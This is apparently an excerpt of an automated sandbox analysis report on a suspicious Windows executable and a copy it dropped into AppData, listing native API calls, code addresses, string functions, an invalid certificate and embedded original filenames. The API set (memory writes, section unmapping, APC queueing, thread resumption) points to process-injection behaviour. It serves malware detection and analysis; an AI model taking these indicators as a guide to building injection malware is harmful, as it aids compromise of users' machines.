Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672AB0 NtWaitForSingleObject,	10_2_01672AB0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672D30 NtUnmapViewOfSection,	10_2_01672D30
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672D00 NtSetInformationFile,	10_2_01672D00
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672D10 NtMapViewOfSection,	10_2_01672D10
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672DD0 NtDelayExecution,	10_2_01672DD0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672DB0 NtEnumerateKey,	10_2_01672DB0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672C60 NtCreateKey,	10_2_01672C60
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672C00 NtQueryInformationProcess,	10_2_01672C00
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672CF0 NtOpenProcess,	10_2_01672CF0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672CC0 NtQueryVirtualMemory,	10_2_01672CC0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672CA0 NtQueryInformationToken,	10_2_01672CA0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672F60 NtCreateProcessEx,	10_2_01672F60
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672F30 NtCreateSection,	10_2_01672F30
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672FE0 NtCreateFile,	10_2_01672FE0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672FA0 NtQuerySection,	10_2_01672FA0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672FB0 NtResumeThread,	10_2_01672FB0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672F90 NtProtectVirtualMemory,	10_2_01672F90
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672E30 NtWriteVirtualMemory,	10_2_01672E30
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672EE0 NtQueueApcThread,	10_2_01672EE0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672EA0 NtAdjustPrivilegesToken,	10_2_01672EA0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01672E80 NtReadVirtualMemory,	10_2_01672E80
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01673010 NtOpenDirectoryObject,	10_2_01673010
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01673090 NtSetValueKey,	10_2_01673090
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016739B0 NtGetContextThread,	10_2_016739B0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01673D70 NtOpenThread,	10_2_01673D70
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01673D10 NtOpenProcessToken,	10_2_01673D10

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_025ED304	0_2_025ED304
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_06A76783	0_2_06A76783
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_06A76790	0_2_06A76790
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_06A754F0	0_2_06A754F0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_06A76530	0_2_06A76530
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_06A750B8	0_2_06A750B8
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_06A77131	0_2_06A77131
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_06A77140	0_2_06A77140
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_06A7DF68	0_2_06A7DF68
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_06A74C80	0_2_06A74C80
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_073E37F8	0_2_073E37F8
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_073E4560	0_2_073E4560
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_073ED672	0_2_073ED672
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 0_2_073ED670	0_2_073ED670
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_00410083	10_2_00410083
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_00403100	10_2_00403100
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0040E103	10_2_0040E103
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_00401210	10_2_00401210
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_00401AC0	10_2_00401AC0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_00401AB6	10_2_00401AB6
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_00416B7E	10_2_00416B7E
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_00416B83	10_2_00416B83
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_00404514	10_2_00404514
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0042E5F3	10_2_0042E5F3
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0040FE5F	10_2_0040FE5F
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0040FE63	10_2_0040FE63
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_00402630	10_2_00402630
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_00404715	10_2_00404715
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016C8158	10_2_016C8158
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01630100	10_2_01630100
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DA118	10_2_016DA118
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016F81CC	10_2_016F81CC
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_017001AA	10_2_017001AA
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016D2000	10_2_016D2000
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016FA352	10_2_016FA352
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164E3F0	10_2_0164E3F0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_017003E6	10_2_017003E6
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016E0274	10_2_016E0274
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016C02C0	10_2_016C02C0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640535	10_2_01640535
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01700591	10_2_01700591
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016F2446	10_2_016F2446
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016E4420	10_2_016E4420
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016EE4F6	10_2_016EE4F6
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640770	10_2_01640770
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01664750	10_2_01664750
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163C7C0	10_2_0163C7C0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0165C6E0	10_2_0165C6E0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01656962	10_2_01656962
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016429A0	10_2_016429A0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0170A9A6	10_2_0170A9A6
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164A840	10_2_0164A840
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01642840	10_2_01642840
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0166E8F0	10_2_0166E8F0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016268B8	10_2_016268B8
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016FAB40	10_2_016FAB40
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016F6BD7	10_2_016F6BD7
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163EA80	10_2_0163EA80
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164AD00	10_2_0164AD00
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DCD1F	10_2_016DCD1F
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0163ADE0	10_2_0163ADE0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01658DBF	10_2_01658DBF
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640C00	10_2_01640C00
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01630CF2	10_2_01630CF2
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016E0CB5	10_2_016E0CB5
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B4F40	10_2_016B4F40
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01682F28	10_2_01682F28
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01660F30	10_2_01660F30
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016E2F30	10_2_016E2F30
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164CFE0	10_2_0164CFE0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01632FC8	10_2_01632FC8
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016BEFA0	10_2_016BEFA0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01640E59	10_2_01640E59
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016FEE26	10_2_016FEE26
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016FEEDB	10_2_016FEEDB
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01652E90	10_2_01652E90
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016FCE93	10_2_016FCE93
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0167516C	10_2_0167516C
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0162F172	10_2_0162F172
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0170B16B	10_2_0170B16B
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0164B1B0	10_2_0164B1B0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016F70E9	10_2_016F70E9
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016FF0E0	10_2_016FF0E0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016EF0CC	10_2_016EF0CC
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016470C0	10_2_016470C0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0162D34C	10_2_0162D34C
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016F132D	10_2_016F132D
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0168739A	10_2_0168739A
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016E12ED	10_2_016E12ED
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0165B2C0	10_2_0165B2C0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016452A0	10_2_016452A0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016F7571	10_2_016F7571
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DD5B0	10_2_016DD5B0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01631460	10_2_01631460
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016FF43F	10_2_016FF43F
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016FF7B0	10_2_016FF7B0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016F16CC	10_2_016F16CC
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01649950	10_2_01649950
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0165B950	10_2_0165B950
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016D5910	10_2_016D5910
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016AD800	10_2_016AD800
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016438E0	10_2_016438E0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016FFB76	10_2_016FFB76
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B5BF0	10_2_016B5BF0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0167DBF9	10_2_0167DBF9
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0165FB80	10_2_0165FB80
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B3A6C	10_2_016B3A6C
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016FFA49	10_2_016FFA49
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016F7A46	10_2_016F7A46
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016EDAC6	10_2_016EDAC6
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016DDAAC	10_2_016DDAAC
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01685AA0	10_2_01685AA0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016E1AA3	10_2_016E1AA3
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016F7D73	10_2_016F7D73
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01643D40	10_2_01643D40
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016F1D5A	10_2_016F1D5A
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_0165FDC0	10_2_0165FDC0
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016B9C32	10_2_016B9C32
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016FFCF2	10_2_016FFCF2
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016FFF09	10_2_016FFF09
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01603FD2	10_2_01603FD2
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01603FD5	10_2_01603FD5
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_016FFFB1	10_2_016FFFB1
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01641F92	10_2_01641F92
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: 10_2_01649EB0	10_2_01649EB0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_026C4544	11_2_026C4544
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_026CD304	11_2_026CD304
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_04E47BD0	11_2_04E47BD0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_04E40040	11_2_04E40040
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_04E40006	11_2_04E40006
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_04E47BC0	11_2_04E47BC0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_05404560	11_2_05404560
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_054037F8	11_2_054037F8
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_0540D662	11_2_0540D662
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_0540D670	11_2_0540D670
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_06E16783	11_2_06E16783
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_06E16790	11_2_06E16790
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_06E154F0	11_2_06E154F0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_06E14C80	11_2_06E14C80
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_06E16530	11_2_06E16530
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_06E150B8	11_2_06E150B8
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_06E17140	11_2_06E17140
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_06E17131	11_2_06E17131
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 11_2_06E1D108	11_2_06E1D108
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01180100	15_2_01180100
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011D6000	15_2_011D6000
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_012102C0	15_2_012102C0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01190535	15_2_01190535
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011B4750	15_2_011B4750
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01190770	15_2_01190770
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_0118C7C0	15_2_0118C7C0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011AC6E0	15_2_011AC6E0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011A6962	15_2_011A6962
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011929A0	15_2_011929A0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_0119A840	15_2_0119A840
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01192840	15_2_01192840
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011C8890	15_2_011C8890
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011768B8	15_2_011768B8
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011BE8F0	15_2_011BE8F0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_0118EA80	15_2_0118EA80
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_0119AD00	15_2_0119AD00
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_0119ED7A	15_2_0119ED7A
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011A8DBF	15_2_011A8DBF
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01198DC0	15_2_01198DC0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_0118ADE0	15_2_0118ADE0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01190C00	15_2_01190C00
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01180CF2	15_2_01180CF2
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011B0F30	15_2_011B0F30
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011D2F28	15_2_011D2F28
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01204F40	15_2_01204F40
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_0120EFA0	15_2_0120EFA0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01182FC8	15_2_01182FC8
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01190E59	15_2_01190E59
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011A2E90	15_2_011A2E90
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_0117F172	15_2_0117F172
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011C516C	15_2_011C516C
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_0119B1B0	15_2_0119B1B0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_0117D34C	15_2_0117D34C
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011933F3	15_2_011933F3
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011952A0	15_2_011952A0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011AB2C0	15_2_011AB2C0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011AD2F0	15_2_011AD2F0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01181460	15_2_01181460
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01193497	15_2_01193497
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011D74E0	15_2_011D74E0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_0119B730	15_2_0119B730
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01199950	15_2_01199950
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011AB950	15_2_011AB950
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01195990	15_2_01195990
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011FD800	15_2_011FD800
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011938E0	15_2_011938E0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011AFB80	15_2_011AFB80
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01205BF0	15_2_01205BF0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011CDBF9	15_2_011CDBF9
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01203A6C	15_2_01203A6C
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01193D40	15_2_01193D40
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011AFDC0	15_2_011AFDC0
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01209C32	15_2_01209C32
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_011A9C20	15_2_011A9C20
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01191F92	15_2_01191F92
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: 15_2_01199EB0	15_2_01199EB0

Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: String function: 011FEA12 appears 37 times
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Code function: String function: 011D7E54 appears 97 times
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: String function: 0162B970 appears 278 times
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: String function: 016AEA12 appears 86 times
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: String function: 01687E54 appears 102 times
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: String function: 016BF290 appears 105 times
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Code function: String function: 01675130 appears 58 times

Source: 8SxJ9aYfJ1.exe

Static PE information: invalid certificate

Source: 8SxJ9aYfJ1.exe, 00000000.00000002.2121045208.000000000398E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs 8SxJ9aYfJ1.exe
Source: 8SxJ9aYfJ1.exe, 00000000.00000000.2069831488.000000000046C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameLUtp.exe< vs 8SxJ9aYfJ1.exe
Source: 8SxJ9aYfJ1.exe, 00000000.00000002.2123643005.00000000069C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs 8SxJ9aYfJ1.exe
Source: 8SxJ9aYfJ1.exe, 00000000.00000002.2124565017.0000000007790000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMML.dll2 vs 8SxJ9aYfJ1.exe
Source: 8SxJ9aYfJ1.exe, 00000000.00000002.2124310201.0000000007590000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs 8SxJ9aYfJ1.exe
Source: 8SxJ9aYfJ1.exe, 00000000.00000002.2120693064.00000000027B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMML.dll2 vs 8SxJ9aYfJ1.exe
Source: 8SxJ9aYfJ1.exe, 00000000.00000002.2113988917.00000000009AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 8SxJ9aYfJ1.exe
Source: 8SxJ9aYfJ1.exe, 0000000A.00000002.2392198546.00000000011C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFINDSTR.EXEj% vs 8SxJ9aYfJ1.exe
Source: 8SxJ9aYfJ1.exe, 0000000A.00000002.2392198546.00000000011A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFINDSTR.EXEj% vs 8SxJ9aYfJ1.exe
Source: 8SxJ9aYfJ1.exe, 0000000A.00000002.2392690731.000000000172D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 8SxJ9aYfJ1.exe
Source: 8SxJ9aYfJ1.exe	Binary or memory string: OriginalFilenameLUtp.exe< vs 8SxJ9aYfJ1.exe

Source: 8SxJ9aYfJ1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

